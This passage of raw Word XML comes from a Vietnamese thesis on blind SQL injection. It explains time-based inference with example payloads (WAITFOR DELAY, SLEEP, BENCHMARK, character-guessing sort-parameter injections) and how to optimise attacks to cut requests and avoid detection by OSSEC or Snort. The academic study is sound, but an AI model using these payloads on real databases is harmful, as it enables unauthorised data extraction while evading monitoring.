      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể inject vào câu truy vấn để kết quả không trả về trong HTML. Tấn công out-of-band ở trên cũng như vậy, nhưng đòi hỏi nhiều điều kiện. Trong đa số các trường hợp này, tấn công out-of-band là không có hiệu quả, cũng như việc sử dụng tấn công out-of-band có thể gây ảnh hưởng đến CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để giải quyết vấn đề này, một kỹ thuật đã được phát triển bởi Chris Anley và Sherief Hammad làm việc tại NGSSoftware. Họ đã nghĩ ra cách làm cho câu truy vấn trả về bị trễ một khoảng thời gian, và việc trễ này phụ thuộc vào điều kiện của kẻ tấn công. Sau khi gửi mã tấn công, kẻ tấn công tiến hành theo dõi thời gian trả về. Nếu có sự chậm trễ trong thời gian trả về, kẻ tấn công có thể suy luận là câu lệnh điều kiện là đúng, và ngược lại. Phương pháp này cho phép áp dụng khi cả nội dung trả về của dữ liệu là giống hệt nhau trong cả hai trường hợp câu điều kiện đúng hoặc sai. Giống như phương pháp trên, thực hiện nhiều lần cho phép kẻ tấn công lấy được các dữ liệu phức tạp của CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Việc tạo ra trễ trong câu truy vấn tùy thuộc vào loại DBMS được sử dụng. MS-SQL hỗ trợ câu lệnh WAITFOR để tạo ra thời gian trễ. Ví dụ sau sẽ tạo ra thời gian trễ 5 giây nếu user là sa: if (select user) = ‘sa’ waitfor delay ‘0:0:5’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với câu lệnh cơ bản này, kẻ tấn công thực hiện tùy biến để lấy thông tin tại nhiều trường hợp khác nhau. Tận dụng kỹ thuật liên quan đến Content-base đã trình bày ở trên, trả về phụ thuộc điều kiện, thay vì buộc ứng dụng trả về nội dung khác nhau, câu truy vấn buộc trả về thời gian trễ. Ví dụ sẽ xảy ra trễ khi ký tự đầu tiên là “A”:</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lastRenderedPageBreak/>
              <w:t>if ASCII(SUBSTRING(‘Admin’,1,1)) = 64 waitfor delay ‘0:0:5’</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>if ASCII(SUBSTRING(‘Admin’,1,1)) = 65 waitfor delay ‘0:0:5’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong MySQL có thể sử dụng hàm SLEEP để tạo ra độ trễ (tính theo miliseconds):  select if(user() like ‘root@%’, sleep(5000), ‘false’). Một lưu ý là đối với phiên bản 5.0.12 trở về trước, hàm SLEEP không được hỗ trợ. Một phương pháp thay thế là sử dụng hàm Benchmark, thực hiện một hành động lặp đi lặp lại. Việc yêu cầu DBMS thực hiện liên tục một tác vụ tốn nhiều thời gian (lấy mã SHA-1 chẳng hạn) có thể sử dụng để tạo độ trễ: select if(user() like ‘root@%’, benchmark(50000,sha1(‘test’)), ‘false’).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kỹ thuật Time-base cho phép lợi dụng để khai thác lấy thông tin trong CSDL. Kỹ thuật này cũng rất hữu ích trong việc xác định ứng dụng có mắc lỗi SQL injection hay không. Trong nhiều trường hợp, khi mà tất cả các dữ liệu trả về đều rất mờ, chưa rõ ràng thì phương pháp time-base là phương pháp hiệu quả nhất để xác định khả năng mắc lỗi của ứng dụng. Việc theo dõi thời gian trả về cũng đơn giản hơn là theo dõi thay đổi trong nội dung dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong chương 1 lần lượt đã đi từ cơ bản của tấn công SQL injection, nguồn gốc, nguyên nhân lỗi cho đến các phương pháp, kỹ thuật được sử dụng để thực hiện tấn công khai thác CSDL. Đặc biệt nhấn mạnh tấn công Blind SQL injection với hai kỹ thuật chính là: Content-base và Time-base. Ngày nay, cùng với sự phát triển của các công nghệ phát triển ứng dụng web, các dạng lỗ hổng dạng non-blind không còn nhiều. Đa số các ứng dụng web nếu mắc lỗi SQL injection đều thuộc dạng blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="00E665FA" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tùy thuộc vào hoàn cảnh và điều kiện cụ thể có thể lựa chọn phương pháp tấn công phù hợp. Sang chương tiếp theo, luận văn sẽ đi sâu vào các kỹ thuật tối ưu tấn công Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E0760C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc459822499"/>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>Các phương pháp tối ưu hóa tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc459822500"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Hạn chế của tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injections là một trong những kỹ thuật tấn công ứng dụng web nguy hiểm nhất. Với tất cả thông tin được lưu trữ trong cơ sở dữ liệu, gần như hoàn toàn có thể bị lấy ra thông qua các yêu cầu HTTP. Nhiều công ty sử dụng các giải pháp như: Tường lửa ứng dụng web (Web Application Firewalls), các hệ thống phát hiện xâm nhập (Intrusion Detection/Prevention Systems) để phát hiện và ngăn chặn. Tuy nhiên, những giải pháp này hoàn toàn có thể bị vượt qua và phá vỡ. Trong hơn 15 năm qua, nhiều kỹ thuật tấn công, tối ưu đã được hoàn thiện để khai thác sâu lỗ hổng này. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong các ví dụ trên, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>luận văn đã cho</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy rằng: Để lấy được 1 ký tự, thuộc dạng có thể nhìn thấy được (printable) thì kẻ tấn công phải thực hiện 94 lần (94 ký tự dạng nhìn thấy được). Điều này sẽ dẫn đến hạn chế về mặt thời gian và băng thông. Nếu như ở các phương pháp non-blind trên, chỉ cần một yêu cầu có thể lấy được một chuỗi các ký tự (ví dụ như tên database có độ dài là 10 ký tự chẳng hạn), thì đối với phương pháp Blind SQL injection sẽ là tối đa: 94 x 10 = 940 lần gửi yêu cầu. Như vậy, chi phí để xác định sẽ lớn hơn rất nhiều, và dữ liệu càng lớn thì chi phí càng lớn. Chi phí ở đây bao gồm hai loại chính: Thời gian và băng thông. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254DE4" w:rsidRPr="00B02A8B" w:rsidRDefault="00254DE4" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thời gian: Mỗi yêu cầu sẽ cần phải một khoảng thời gian để thực hiện. Việc thực hiện nhiều yêu cầu liên tục sẽ cần nhiều thời gian hơn. Nếu như các phương pháp như error base hay union base thì chỉ cần 1 yêu cầu, giả sử hế</w:t>
      </w:r>
      <w:r w:rsidR="00B02A8B" w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t 1s, thì phương pháp Blind SQL injection cần khoảng 94s để lấy một ký tự, và 940s để lấy một chuỗi 10 ký tự, có nghĩa khoảng 15 phút. Chưa kể đến các yếu tố ngoại cảnh là khi truy vấn nhiều, thời gian để lấy một yêu cầu có thể tăng lên. Trong thực tế, đối với nhiều ứng dụng, thời gian để thực hiện một yêu cầu có thể lớn hơn 1s nhiều lần, có thể đến 1 phút.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02A8B" w:rsidRPr="005D3C52" w:rsidRDefault="004415A7" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Băng thông: Mỗi lần yêu cầu, sẽ tốn một khoảng băng thông để gửi yêu cầu, và băng thông để nhận yêu cầu. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Việc thực hiện nhiều yêu cầu liên tục sẽ cần nhiề</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>u băng thông</w:t>
      </w:r>
      <w:r w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hơn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Tương tự như ví dụ về thời gian, số lượng băng thông cũng sẽ bị tăng gấp lên 940 lần cho một chuỗi 10 ký tự. đương nhiên sự gia tăng về băng thông sẽ kéo theo sự gia tăng về thời gian, vì phải cần có thời gian để tải các thông tin về.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một vấn đề khá</w:t>
      </w:r>
      <w:r w:rsidR="001F366C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> là, dù các hệ thống tường lửa không thể chặn được hoàn toàn tất cả các cuộc tấn công, nhưng lại có tác dụng như một công cụ giám sát. Việc một đối tượng liên tục thực hiện các yêu cầu gần giống nhau, liên tục trong một khoảng thời gian dài hoàn toàn có thể gây ra sự chú ý đối với quản trị hệ thống. Một chuyên viên quản trị hệ thống hoàn toàn có thể nhìn ra sự bất bình thường này. </w:t>
      </w:r>
      <w:r w:rsidR="008F7562">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày nay, các công cụ phân tích log tự động như: ossec, snort dễ dàng phát hiện ra các mẫu tấn công để từ đó đưa ra cảnh báo. Do đó, nếu cuộc tấn công kéo dài quá lâu, hoàn toàn có thể bị phát hiện trước khi kịp lấy hết thông tin cần thiết. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A47EB" w:rsidRDefault="007A47EB" w:rsidP="007A47EB">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F47021" wp14:editId="697E6499">
            <wp:extent cx="5733298" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Picture 29" descr="5. access.log SQLi Found - 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ccess.log SQLi Found - GL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect t="13563" r="1102" b="9655"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5737904" cy="2373631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A47EB" w:rsidRPr="007A47EB" w:rsidRDefault="007A47EB" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc459819437"/>
      <w:r w:rsidRPr="007A47EB">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="007A47EB">
        <w:t>: Access log của web server lưu thông tin về mã tấn công SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="0094116B" w:rsidRDefault="0094116B" w:rsidP="0094116B">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30E62DC8" wp14:editId="0977103A">
            <wp:extent cx="5707336" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Picture 30" descr="sguilET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ilETrules.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5711096" cy="3135790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094116B" w:rsidRPr="0094116B" w:rsidRDefault="0094116B" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc459819438"/>
      <w:r w:rsidRPr="0094116B">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="0094116B">
        <w:t>: Cảnh báo OSSEC về tấn công SQL injeciton</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Do đó, các kỹ thuật tấn công SQL injection cần phải được được tối ưu (optimized), giúp nâng cao xác suất thành công của cuộc tấn công. Lợi ích cơ bản của việc tối ưu hóa tấn công là giúp lấy dữ liệu trả về nhanh hơn, tiết kiệm thời gian, cũng như giảm việc gây ra tắc nghẽn mạng, tránh bị phát hiện. Một trong những lý do cần phải tối ưu đó là tốc độ, giúp cắt giảm các yêu cầu, thời gian gửi yêu cầu không cần thiết.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong </w:t>
      </w:r>
      <w:r w:rsidR="00804310" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>phần</w:t>
      </w:r>
      <w:r w:rsidR="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00804310" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tiếp theo</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, luận văn sẽ trình bày một số phương pháp tối ưu, và biến thể giúp nâng cao hiệu quả, tiết kiệm chi phí trong tấn công Blind SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc459822501"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Các phương pháp tối ưu hóa truyền thống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Máy tính chỉ hiểu được các con số, đó là lý do tại sao bảng mã ASCII (American Standard Code for Information Interchange) được tạo ra. Mỗi mã ASCII là đại diện của một ký tự. Bất kỳ ký tự ASCII nào cũng được đại diện bởi 1 byte hoặc 8 bit, thường được gọi là 1 octet. Khi tấn công SQL injection, thông thường sẽ không thực hiện dò quét đầy đủ trong bảng mã ASCII, bởi vì không phải tất cả các ký tự sẽ có trong cơ sở dữ liệu. Chính vì thế, các cuộc tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chỉ tập trung vào các mã ASCII từ 32 đến 126, là một bộ 94 ký tự. Để biểu diễn bộ này thực tế chỉ cần 7 bit, bởi vì bit đầu tiên trong octet chắc chắn là 0. Bảng sau sẽ cho thấy rõ hơn về vấn đề này:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E730B8" w:rsidRPr="00E730B8" w:rsidRDefault="00E730B8" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc459803829"/>
      <w:r w:rsidRPr="00E730B8">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00E730B8">
        <w:t>: Ví dụ chuyển đổi giữa các hệ cơ số</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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029"/>
        <w:gridCol w:w="3059"/>
        <w:gridCol w:w="3037"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00E730B8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029"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Decimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3059"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Hexadecimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="303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Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00E730B8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="302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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037"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000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00E730B8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="302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127</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3059"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7F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037"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1111111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Trong ví dụ tấn công ở chương 1, kẻ tấn công sẽ sử dụng phương pháp liên tục dùng các giá trị điều kiện để lấy ra được giá trị chính xác chữ cái đầu của giá trị tên database. Cụ thể, kẻ tấn công lần lượt thử với toàn bộ các ký tự nhìn thấy được trong bảng mã ASCII: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?sort=if(substr(database,1,1)=’A’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?sort=if(substr(database,1,1)=’B’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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sort=if(substr(database,1,1)=’9’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
